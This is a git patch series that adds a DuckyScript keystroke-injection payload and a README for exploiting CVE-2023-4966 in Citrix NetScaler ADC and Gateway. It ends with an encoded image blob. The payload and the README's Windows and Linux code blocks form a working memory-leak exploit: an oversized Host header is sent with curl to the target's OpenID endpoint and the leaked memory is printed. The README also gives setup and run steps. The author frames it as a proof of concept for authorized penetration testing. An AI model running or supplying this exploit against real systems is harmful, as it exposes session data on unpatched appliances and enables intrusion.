From 59d534c24cf8b0294c3b608872b5320248930bf7 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 31 Oct 2023 16:48:25 +0100 Subject: [PATCH 1/6] Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 --- .../lin-payload.txt | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt diff --git a/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt b/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt new file mode 100644 index 000000000..f829d4082 --- /dev/null +++ b/payloads/library/execution/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt @@ -0,0 +1,48 @@ +* REM ################################################################################## +* REM # # +* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : incident-response # +* REM # Target : Citrix NetScaler ADV; NetScaler Gateway # +* REM # # +* REM ################################################################################## + +* REM GNU/Linux Version + +QUACK DELAY 3000 +QUACK CTRL-ALT t +QUACK DELAY 1000 + +QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n') +QUACK ENTER +QUACK DELAY 500 +QUACK STRING headers="-H 'Host:$header_value'" +QUACK ENTER +QUACK DELAY 500 + +* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) +QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +QUACK ENTER +QUACK DELAY 500 + +QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "--- Dumped memory ---" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "$response" | cut -c 131051- +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "--- End ---" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING else +QUACK ENTER +QUACK DELAY 500 +QUACK STRING echo "Could not dump memory" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING fi +QUACK ENTER From bc056509f0ec939c9e08e1d77096329b8c37494d Mon Sep 17 00:00:00 2001 From: aleff-github Date: Tue, 31 Oct 2023 16:49:28 +0100 Subject: [PATCH 2/6] README --- .../README.md | 194 ++++++++++++++++++ .../assets/1.png | Bin 0 -> 62296 bytes .../lin-payload.txt | 0 .../script.sh | 17 ++ .../win-payload.txt | 59 ++++++ 5 files changed, 270 insertions(+) create mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md create mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png rename payloads/library/{execution => incident_response}/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt (100%) create mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh create mode 100644 payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md new file mode 100644 index 000000000..b04d39ccc --- /dev/null +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md @@ -0,0 +1,194 @@ +# Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 + +This payload sends an HTTP request to a remote server using the `curl` command. If the request succeeds, it means the exploit was successful. Conversely, if the request fails, it indicates that the target has resisted the attack. + +This payload is a Proof of Concept (POC) based on DuckyScript and is intended for use only in authorized penetration testing. CVE-2023-4966 [[1](#sources)] has been resolved, and I have decided to release this payload only now to minimize the risk of it being used inappropriately. Please use this payload exclusively when you are fully aware of what you are doing and have obtained explicit authorization from the target. + +**Category**: incident-response + +## Index + +- [Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](#exploit-citrix-netscaler-adc-and-gateway-through-cve-2023-4966) + - [CVE-2023-4966](#cve-2023-4966) + - [Summary](#summary) + - [Impacted Products](#impacted-products) + - [Settings](#settings) + - [DuckyScript Extensions Used](#duckyScript-extensions-used) + - [Payload Description Windows](#payload-description-windows) + - [Payload Description Linux](#payload-description-linux) + - [Script.sh](#script-sh) + - [Sources](#sources) + - [Credits](#credits) + +## CVE-2023-4966 + +Multiple vulnerabilities have been discovered in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). + +### Summary + +NetScaler ADC and NetScaler Gateway contain unauthenticated buffer-related vulnerabilities mentioned below + +### Impacted Products + +The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities: + + - NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50 + - NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15 + - NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19 + - NetScaler ADC 13.1-FIPS before 13.1-37.164 + - NetScaler ADC 12.1-FIPS before 12.1-55.300 + - NetScaler ADC 12.1-NDcPP before 12.1-55.300 + +***Note**: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.* + +This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action. + +![](./assets/1.png) + +***Source**: The information was acquired from the official website of [support.citrix.com](#sources).* + +## Settings + +The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address. + +```DuckyScript +* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) +QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" +``` + +## Payload Description Windows + +In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header. + +```powershell +$header_value = 'a' * 24576 +``` + +Here, all newline characters ("\n") are removed from the string stored in `$header_value`. This is done to ensure that the string doesn't contain any line break characters. + +```powershell +$header_value = $header_value -replace "\n", "" +``` + +A variable `$headers` is created, which holds an HTTP header formatted as a string. This header will be used in the subsequent HTTP request. + +```powershell +$headers = "-H 'Host:$header_value'" +``` + +Here, a variable `$headers` is created as a hashtable containing the HTTP header. In this case, only the "Host" header is used, with the value from `$header_value`. + +```powershell +$headers = @{ 'Host' = $header_value } +``` + +This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section). + +```powershell +$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" +``` + +Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable. + +```powershell +$response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 +``` + +This `if` statement checks if the first three characters of the HTTP response in the `$response` variable are equal to "200," indicating a successful HTTP response. + +```powershell +if ($response.Substring(0, 3) -eq "200") +``` + +If the preceding condition is true, some messages are printed to indicate the beginning of the output. + +```powershell +Write-Host "--- Dumped memory ---" +$response.Substring(131050) +Write-Host "--- End ---" +``` + +If the initial condition of the `if` statement is not met, a message is printed, indicating that the machine is not vulnerable. + +```powershell +Write-Host "Could not dump memory" +``` + +## Payload Description Linux + +This line sets the `header_value` variable to a string containing 24,576 'a' characters. It uses the `yes` command to repeatedly output 'a' and `head` to limit it to 24,576 lines. The `tr` command is used to remove any newline characters, resulting in a long string of 'a's. + +```bash +header_value=$(yes a | head -n 24576 | tr -d '\n') +``` + +Here, the `headers` variable is constructed with the `-H` option for the cURL command. It sets the 'Host' header to the previously generated `header_value`. + +```bash +headers="-H 'Host:$header_value'" +``` +This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable. + +```bash +response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) +``` + +In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`. + +```bash +if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then + echo "--- Dumped memory ---" + echo "$response" | cut -c 131051- + echo "The #HOSTNAME is vulnerable!" + echo "--- End ---" +else + echo "Could not dump memory" +fi +``` + +## Script sh + +The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit. + +Example Execution: + +```shell +./script.sh 192.168.1.200 +``` + +Before running the script, you might need to grant execute permissions to the file, as mentioned. You can do this with the following command: + +```shell +sudo chmod +x script.sh +``` + +After assigning execute permissions, the above command allows the user to run the script without having to specify the sh command before the script's name. + +## Sources + +- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967 +- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready +- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt +- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/ + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/assets/1.png new file mode 100644 index 0000000000000000000000000000000000000000..105a0867fb47d7eae1805f19b80b508dd27f08b1 GIT binary patch literal 62296 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 